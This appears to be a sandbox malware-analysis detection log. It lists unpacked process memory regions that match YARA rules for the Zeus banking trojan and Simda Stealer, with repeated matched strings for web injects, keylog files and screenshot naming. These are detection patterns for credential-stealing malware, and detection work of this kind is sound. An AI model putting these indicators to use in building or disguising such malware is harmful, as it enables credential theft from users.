1.3.svchost.exe.39e0000.14.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.10.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.27.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
35.2.JbrLYfXaOpqnSngA.exe.3290000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.36.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.42.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
31.2.JbrLYfXaOpqnSngA.exe.8b0000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
1.3.svchost.exe.3c60000.6.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.34.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.2606000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49810:$a1: name=%s&port=%u 0x48fa8:$a2: data_inject 0x49198:$a3: keylog.txt 0x48e3d:$a4: User-agent: %s]]] 0x49964:$a5: %s\%02d.bmp
1.3.svchost.exe.a00000.46.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
13.2.JbrLYfXaOpqnSngA.exe.a00000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
21.2.JbrLYfXaOpqnSngA.exe.c22000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.23.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
23.2.JbrLYfXaOpqnSngA.exe.b92000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
0.2.Bonelessness.exe.400000.1.raw.unpack	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
0.2.Bonelessness.exe.400000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4fc10:$a1: name=%s&port=%u 0x4f3a8:$a2: data_inject 0x4f598:$a3: keylog.txt 0x4f23d:$a4: User-agent: %s]]] 0x4fd64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.15.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
29.2.JbrLYfXaOpqnSngA.exe.3012000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.40.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.3c60000.4.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.37.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
16.2.JbrLYfXaOpqnSngA.exe.2fe0000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.25.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.36.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
39.2.JbrLYfXaOpqnSngA.exe.2940000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.28.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
33.2.JbrLYfXaOpqnSngA.exe.2b40000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.22.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
16.2.JbrLYfXaOpqnSngA.exe.2fe0000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
0.3.Bonelessness.exe.86d460.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49810:$a1: name=%s&port=%u 0x48fa8:$a2: data_inject 0x49198:$a3: keylog.txt 0x48e3d:$a4: User-agent: %s]]] 0x49964:$a5: %s\%02d.bmp
1.3.svchost.exe.2601000.0.raw.unpack	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
1.3.svchost.exe.2601000.0.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4e810:$a1: name=%s&port=%u 0x4dfa8:$a2: data_inject 0x4e198:$a3: keylog.txt 0x4de3d:$a4: User-agent: %s]]] 0x4e964:$a5: %s\%02d.bmp
23.2.JbrLYfXaOpqnSngA.exe.b92000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
31.2.JbrLYfXaOpqnSngA.exe.852000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.20.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.2606c00.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.27.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.19.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.2570000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
31.2.JbrLYfXaOpqnSngA.exe.852000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.31.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.38.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.3c60000.5.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
0.3.Bonelessness.exe.868460.0.raw.unpack	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
0.3.Bonelessness.exe.868460.0.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4e810:$a1: name=%s&port=%u 0x4dfa8:$a2: data_inject 0x4e198:$a3: keylog.txt 0x4de3d:$a4: User-agent: %s]]] 0x4e964:$a5: %s\%02d.bmp
25.2.JbrLYfXaOpqnSngA.exe.2ab0000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.13.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.29.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.23.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.2.svchost.exe.2d83c00.6.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.2.svchost.exe.24c2000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.22.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
37.2.JbrLYfXaOpqnSngA.exe.27f0000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
16.2.JbrLYfXaOpqnSngA.exe.2e42000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
16.2.JbrLYfXaOpqnSngA.exe.2e42000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
37.2.JbrLYfXaOpqnSngA.exe.27f0000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.20.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
13.2.JbrLYfXaOpqnSngA.exe.a00000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
1.2.svchost.exe.2d83c00.6.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.24.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.29.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.3a80000.9.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
0.3.Bonelessness.exe.86d460.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48410:$a1: name=%s&port=%u 0x47ba8:$a2: data_inject 0x47d98:$a3: keylog.txt 0x47a3d:$a4: User-agent: %s]]] 0x48564:$a5: %s\%02d.bmp
1.3.svchost.exe.3c60000.4.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.37.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
0.2.Bonelessness.exe.407000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.24.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.26.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
0.3.Bonelessness.exe.86e060.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
0.2.Bonelessness.exe.400000.1.unpack	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
0.2.Bonelessness.exe.400000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4e810:$a1: name=%s&port=%u 0x4dfa8:$a2: data_inject 0x4e198:$a3: keylog.txt 0x4de3d:$a4: User-agent: %s]]] 0x4e964:$a5: %s\%02d.bmp
39.2.JbrLYfXaOpqnSngA.exe.2940000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
1.2.svchost.exe.407000.0.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
23.2.JbrLYfXaOpqnSngA.exe.c40000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
29.2.JbrLYfXaOpqnSngA.exe.3012000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
5.2.JbrLYfXaOpqnSngA.exe.e42000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
39.2.JbrLYfXaOpqnSngA.exe.e42000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
37.2.JbrLYfXaOpqnSngA.exe.2652000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.21.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
33.2.JbrLYfXaOpqnSngA.exe.2962000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.18.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
27.2.JbrLYfXaOpqnSngA.exe.2342000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
23.2.JbrLYfXaOpqnSngA.exe.c40000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
